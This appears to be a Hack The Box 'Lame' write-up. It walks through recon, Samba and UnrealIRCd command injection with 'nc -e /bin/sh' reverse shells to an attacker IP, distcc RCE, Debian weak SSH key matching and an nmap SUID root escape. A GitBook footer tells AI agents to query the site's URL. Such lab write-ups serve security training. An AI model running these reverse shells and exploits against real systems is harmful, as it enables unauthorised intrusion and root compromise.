# Lame Recon ```bash nmap -p21,22,139,445,3632 -sV -sC -T4 -Pn -oA 10.10.10.3-nmap 10.10.10.3 Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-30 05:49 +08 Nmap scan report for beep.htb (10.10.10.3) Host is up (0.017s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.43 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA) |_ 2048 5656240f211ddea72bae61b1243de8f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_smb2-time: Protocol negotiation failed (SMB2) | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2024-01-29T16:50:20-05:00 |_clock-skew: mean: 2h30m54s, deviation: 3h32m20s, median: 45s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 62.35 seconds ``` 21/tcp open ftp vsftpd 2.3.4 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Looking old #### ftp ```bash searchsploit vsftpd 2.3.4 --------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------- --------------------------------- vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py vsftpd 2.3.4 - Backdoor Command Execution (Metaspl | unix/remote/17491.rb --------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results ``` **Manual ftp exploit (not working) :** ```bash nc 10.10.10.3 21 220 (vsFTPd 2.3.4) USER 0xdf:) 331 Please specify the password. PASS 0xdf-not-a-password nc 10.10.10.3 6200 ``` **ftp vulnerable code** ```bash USER anyname-end-with-smile:) ``` #### samba ```bash searchsploit samba 3.0.20 --------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------- --------------------------------- Samba 3.0.10 < 3.3.5 - Format String / Security By | multiple/remote/10095.txt Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' | unix/remote/16320.rb Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py --------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results ``` **Manual samba exploit (working) :** ```bash smbclient //lame.htb/tmp Password for [WORKGROUP\kali]: Anonymous login successful smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.43 443`" Password: session setup failed: NT_STATUS_IO_TIMEOUT smb: \> sudo nc -nvlp 443 ``` **Smb vulnerable code** ```rb def exploit connect # lol? username = "/=`nohup " + payload.encoded + "`" begin simple.client.negotiate(false) simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false) rescue ::Timeout::Error, XCEPT::LoginError # nothing, it either worked or it didn't ;) end handler end ``` #### dstccd ```bash searchsploit distcc ------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- DistCC Daemon - Command Execution (Metasploit) | multiple/remote/9915.rb ------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results Papers: No Results ``` distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks. CVE-2004-2687 ```bash wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse ``` **RCE (normal user)** ```bash nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-31 04:52 +08 Nmap scan report for lame.htb (10.10.10.3) Host is up (0.042s latency). PORT STATE SERVICE 3632/tcp open distccd | distcc-exec: | VULNERABLE: | distcc Daemon Command Execution | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2004-2687 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Allows executing of arbitrary commands on systems running distccd 3.1 and | earlier. The vulnerability is the consequence of weak service configuration. | | Disclosure date: 2002-02-01 | Extra information: | | uid=1(daemon) gid=1(daemon) groups=1(daemon) ``` **Bruteforcing ssh public key for breached private keys** ``` git clone https://github.com/g0tmi1k/debian-ssh cd debian-ssh cd common_keys #unzip tar jxf debian_ssh_rsa_2048_x86.tar.bz2 cd rsa/2048 #grep recurssive line grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub ``` **suid** ```bash find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls 344956 768 -rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap sh-3.2$ /usr/bin/nmap --interactive Starting Nmap V. 4.53 ( http://insecure.org ) Welcome to Interactive Mode -- press h for help nmap> !sh whoami root ``` **local services** ```bash netstat -tnlp netstat -ano netstat -anp ``` **Unreallircd Exploit** ``` ps aux root 5622 0.0 0.4 8540 2364 ? S 06:01 0:08 /usr/bin/unrealircd sh-3.2$ nc 127.0.0.1 6697 :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead ``` Exploit Code ```bash echo "AB; nc -e /bin/sh 10.10.14.43 6767" | nc 127.0.0.1 6697 ``` Listener ```bash nc -nvlp 6767 listening on [any] 6767 ... connect to [10.10.14.43] from (UNKNOWN) [10.10.10.3] 39012 whoami root ``` #### Lesson Learnt : * Remember check for suid * Enumerate all service and their versions * Check weird ps that run as root * Check sensitive readable files (even ssh key) * You can bruteforce public ssh keys to find matching private key --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jackmeister.gitbook.io/zctf-writeups/hack-the-box/linux/lame.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.